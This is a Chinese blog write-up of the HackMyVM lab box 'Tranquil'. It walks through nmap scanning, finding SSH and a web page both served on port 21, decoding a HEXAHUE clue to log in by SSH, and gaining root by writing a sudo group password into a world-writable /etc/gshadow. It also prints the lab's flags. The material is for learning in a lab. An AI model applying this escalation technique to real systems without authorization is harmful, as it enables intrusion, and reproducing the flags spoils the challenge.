Loading

[HMV] Tranquil

0x00 配置

攻击机 IP: 172.16.1.25

靶机 IP: 172.16.1.88

0x01 攻击

使用 Nmap 扫描目标靶机开放的端口

┌──(root㉿Kali-VM)-[~]
└─# nmap -sC -sV -p- 172.16.1.88
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 13:56 CST
Nmap scan report for 172.16.1.88
Host is up (0.00044s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
|_ftp-bounce: ERROR: Script execution failed (use -d to debug)
| ssh-hostkey: 
|   3072 0e033b7800291dba60860ed3bb7e3c04 (RSA)
|   256 2a474d9cce0761caf0ca588b5b0fd4db (ECDSA)
|_  256 6c4250a560e90f370fbeecd12074299c (ED25519)
MAC Address: 08:00:27:F4:24:B0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.37 seconds

只开放了一个 21 端口,奇怪的是在这个 21 端口上既扫描出了 FTP,又扫描出了 SSH,就是没有 HTTP?很罕见啊,不过 Nmap 扫 FTP 的时候报错了,加上 -d 看看日志

image-20230315143249441

看来 21 端口上并没有 FTP 服务... 返回的全是 OpenSSH。再 curl 看看?

┌──(root㉿Kali-VM)-[~/work]
└─# curl 172.16.1.88:21 
<img src="tranquil.jpg">


<!-- We are one, humans, computers and ports.
- guru -->

curl 居然返回了 HTML,看来还有一个网页搭在 21 端口上,好骚的操作... 打开网页看看

image-20230315143520077

嗯... Chrome 和 Edge 都会报错,因为默认不允许访问 21 这个保留端口,Firefox 可以通过修改配置解除这个限制 (解除方法)

image-20230315143922968

打开网页后发现一堆小格子,这是 HEXAHUE 加密,解密后得到 KEEPCALM

image-20230315144104806

尝试用之前的 "guru" 作为用户名,"KEEPCALM" 作为密码,登录 SSH

[C:\~]$ ssh guru@172.16.1.88 21


Connecting to 172.16.1.88:21...
Connection established.
To escape to local shell, press Ctrl+Alt+].

Linux tranquil 5.10.0-8-686-pae #1 SMP Debian 5.10.46-5 (2021-09-23) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Sep 30 09:04:21 2021 from 192.168.1.51
guru@tranquil:~$

成功登录 Shell。查看所有用户

guru@tranquil:~$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
guru:x:1000:1000:guru,,,:/home/guru:/bin/bash

只发现了两个用户,也就是说我们需要直接从 guru 用户提权到 root。先把 user.txt 拿了

guru@tranquil:~$ ls -al ~
total 32
drwxr-xr-x 3 guru guru 4096 Mar 15 02:17 .
drwxr-xr-x 3 root root 4096 Sep 30  2021 ..
-rw-r--r-- 1 guru guru  220 Sep 30  2021 .bash_logout
-rw-r--r-- 1 guru guru 3526 Sep 30  2021 .bashrc
drwxr-xr-x 3 guru guru 4096 Sep 30  2021 .local
-rw-r--r-- 1 guru guru  807 Sep 30  2021 .profile
-rw------- 1 guru guru   16 Sep 30  2021 user.txt
-rw------- 1 guru guru   54 Mar 15 02:17 .Xauthority

guru@tranquil:~$ cat ~/user.txt 
HMVbecauseweare

开始寻找提权方法。先查看具有特权的程序

guru@tranquil:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/su
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/chfn
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

guru@tranquil:~$ sudo -l
[sudo] password for guru: 
Sorry, user guru may not run sudo on tranquil.
guru@tranquil:~$

可惜并不能运行 Sudo。再找找有权限写入的文件

guru@tranquil:~$ find / -writable ! -path '/proc*' ! -path '/run*' ! -path '/sys*' ! -path '/dev*' -type f 2>/dev/null
/etc/gshadow
/home/guru/.profile
/home/guru/.bash_history
/home/guru/.bash_logout
/home/guru/user.txt
/home/guru/.bashrc
/home/guru/.Xauthority
/home/guru/.wget-hsts

发现一个 "/etc/gshadow",和 shadow 一样,shadow 负责存储用户的密码,而 gshadow 是负责存储组 (group) 的密码的,那么我们岂不是可以把 sudo 组的密码改掉,然后把 guru 加进 sudo 组?

guru@tranquil:~$ openssl passwd -1 Qwer1234
$1$PP5ztOQV$POPQfv/HSlt61n/oZTJwx.

guru@tranquil:~$ nano /etc/gshadow

guru@tranquil:~$ newgrp sudo
Password: 

guru@tranquil:~$ sudo -l
[sudo] password for guru: 
Matching Defaults entries for guru on tranquil:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User guru may run the following commands on tranquil:
    (ALL : ALL) ALL
    
guru@tranquil:~$ sudo su

root@tranquil:/home/guru#

成功获得 Root,最后获得 root.txt

root@tranquil:/home/guru# ls -al ~
total 24
drwx------  3 root root 4096 Sep 30  2021 .
drwxr-xr-x 18 root root 4096 Sep 30  2021 ..
-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc
drwxr-xr-x  3 root root 4096 Sep 30  2021 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rw-------  1 root root   15 Sep 30  2021 root.txt

root@tranquil:/home/guru# cat ~/root.txt 
HMVyourfriends

0x02 总结

把 SSH 和 HTTP 同时搭在 21 端口有点骚

posted @ 2023-03-20 10:59  20206675  阅读(44)  评论(0编辑  收藏  举报